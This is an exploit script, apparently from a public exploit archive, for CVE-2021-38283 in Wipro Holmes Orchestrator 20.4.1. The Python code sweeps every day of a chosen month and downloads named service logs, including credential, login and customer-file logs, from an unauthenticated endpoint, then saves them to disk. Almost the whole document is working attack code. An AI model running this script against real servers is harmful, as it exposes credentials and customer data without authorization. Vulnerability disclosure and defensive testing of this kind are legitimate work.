
Wipro Holmes Orchestrator 20.4.1 - Log File Disclosure - 2021-38283

  1. # Exploit Title: Wipro Holmes Orchestrator 20.4.1 - Log File Disclosure
  2. # Date: 09/08/2021
  3. # Exploit Author: Rizal Muhammed @ub3rsick
  4. # Vendor Homepage: https://www.wipro.com/holmes/
  5. # Version: Wipro Holmes Orchestrator v20.4.1
  6. # Tested on: Windows
  7. # CVE : CVE-2021-38283
  8.  
  9. import requests as rq
  10. import argparse
  11. import datetime
  12. import os
  13. from calendar import monthrange
  14. from multiprocessing.dummy import Pool as ThreadPool
  15. from functools import partial
  16.  
# TCP port of the Orchestrator web service. Edit this if the target listens
# somewhere other than the default 8001.
port = 8001

# File names the unauthenticated /log/<date>/<name> endpoint is probed for.
# All of them are plain-text service logs except CustomerFile.zip, an archive.
log_list = [
    "AlertService.txt",
    "ApprovalService.txt",
    "AuditService.txt",
    "CustomerController.txt",
    "CustomerDomainCredentialService.txt",
    "CustomerFile.zip",
    "CustomerService.txt",
    "DashboardController.txt",
    "DataParseService.txt",
    "DomainService.txt",
    "ExecutionService.txt",
    "ExternalAPIService.txt",
    "FilesController.txt",
    "FormService.txt",
    "InfrastructureService.txt",
    "ITSMConfigPrepService.txt",
    "LicenseService.txt",
    "LoginService.txt",
    "MailService.txt",
    "MasterdataController.txt",
    "NetworkService.txt",
    "OrchestrationPreparationService.txt",
    "ProblemInfrastructureService.txt",
    "ProcessExecutionService.txt",
    "ServiceRequestService.txt",
    "SolutionController.txt",
    "SolutionLiveService.txt",
    "SolutionService.txt",
    "StorageService.txt",
    "TaskService.txt",
    "TicketingService.txt",
    "UserController.txt",
    "UtilityService.txt",
]
  30.  
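def check_month(val):
    """argparse ``type`` callback: parse *val* as a calendar month number.

    Args:
        val: Raw command-line string (an ``int`` is accepted as well).

    Returns:
        The month as an ``int`` in the range 1-12.

    Raises:
        argparse.ArgumentTypeError: if *val* is not an integer or lies outside
            1-12. Non-numeric input is converted to this exception too, so the
            user sees "X is not a valid month" rather than argparse's generic
            "invalid check_month value" message.
    """
    try:
        month = int(val)
    except (TypeError, ValueError):
        raise argparse.ArgumentTypeError("%s is not a valid month" % val) from None
    if 1 <= month <= 12:
        return month
    raise argparse.ArgumentTypeError("%s is not a valid month" % val)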
  37.  
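def check_year(val):
    """argparse ``type`` callback: parse *val* as a plausible log year.

    Args:
        val: Raw command-line string (an ``int`` is accepted as well).

    Returns:
        The year as an ``int`` between 1960 and the current local year,
        inclusive -- logs cannot exist for dates in the future.

    Raises:
        argparse.ArgumentTypeError: if *val* is not an integer or is outside
            that range. Non-numeric input is converted to this exception so
            the message matches the out-of-range case.
    """
    try:
        year = int(val)
    except (TypeError, ValueError):
        raise argparse.ArgumentTypeError("%s is not a valid year" % val) from None
    if 1960 <= year <= datetime.date.today().year:
        return year
    raise argparse.ArgumentTypeError("%s is not a valid year" % val)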
  44.  
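def do_request(target, date, log_file, *, timeout=15):
    """Fetch one log file from the Orchestrator without credentials and save it.

    Requests ``http://<target>/log/<date>/<log_file>``. No session, token or
    cookie is sent -- that the endpoint serves the file anyway is the
    disclosure this PoC demonstrates.

    Args:
        target: ``host:port`` of the Orchestrator web service.
        date: Log directory name, an ISO ``YYYY-MM-DD`` string.
        log_file: File name from ``log_list`` (``*.txt`` or ``CustomerFile.zip``).
        timeout: Seconds to wait for connect/read before abandoning this file,
            so a single unresponsive host cannot hang the whole month sweep.

    Side effects:
        On a hit, the raw response body is written to
        ``./logs/<date>_<log_file>`` (the directory must already exist) and
        progress is printed to stdout. Transport errors are printed and the
        file is skipped; they are not raised to the caller.
    """
    log_url = f"http://{target}/log/{date}/{log_file}"
    log_name = f"{date}_{log_file}"
    print(f"[*] Requesting Log: /log/{date}/{log_file}")
    try:
        resp = rq.get(log_url, timeout=timeout)
    except rq.RequestException as exc:
        # Connection refused, DNS failure, timeout: report and move on.
        print(f"[-] Request failed for {log_url}: {exc}")
        return
    # A 200 is not enough on its own: presumably the app answers 200 with a
    # branded page when the file is absent, so a body containing the vendor
    # string is treated as a miss.
    if resp.status_code == 200 and b"Wipro Ltd." not in resp.content:
        print(f"[+] Success: {log_url}")
        # Write the raw bytes: CustomerFile.zip must be saved byte-for-byte,
        # and text mode would re-encode the .txt logs via a guessed charset.
        with open(f"logs/{log_name}", "wb") as lf:
            lf.write(resp.content)
        print(f"[*] Log File Written to ./logs/{log_name}")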
  55.  
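def main():
    """Command-line entry point: sweep one month of logs on a single target.

    Parses ``-t/--target-ip``, ``-m/--month``, ``-y/--year`` and an optional
    ``-p/--port`` (default: the module-level ``port``), creates ``./logs`` if
    needed, then calls ``do_request`` sequentially for every (day, log file)
    pair -- ``len(log_list)`` requests per day of the month.
    """
    parser = argparse.ArgumentParser(description="Wipro Holmes Orchestrator 20.4.1 Unauthenticated Log File Disclosure",
                                     epilog="Vulnerability Discovery, PoC Author - Rizal Muhammed @ub3sick")
    parser.add_argument("-t", "--target-ip", help="IP Address of the target server", required=True)
    parser.add_argument("-m", "--month", help="Month of the log, (1=JAN, 2=FEB etc.)", required=True, type=check_month)
    parser.add_argument("-y", "--year", help="Year of the log", required=True, type=check_year)
    parser.add_argument("-p", "--port", help=f"TCP port of the Orchestrator web service (default: {port})",
                        type=int, default=port)
    args = parser.parse_args()

    # One ISO date per day of the requested month; the endpoint is keyed by date.
    ndays = monthrange(args.year, args.month)[1]
    date_list = [datetime.date(args.year, args.month, day).isoformat() for day in range(1, ndays + 1)]
    target = f"{args.target_ip}:{args.port}"

    # exist_ok avoids the check-then-create race of os.path.exists + makedirs.
    os.makedirs("logs", exist_ok=True)

    for log_date in date_list:
        for log_file in log_list:
            do_request(target, log_date, log_file)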
  75.  
# Script guard: nothing above runs on import, so the helpers can be reused
# from other tooling without triggering the sweep.
if __name__ == "__main__":
    main()
  78.            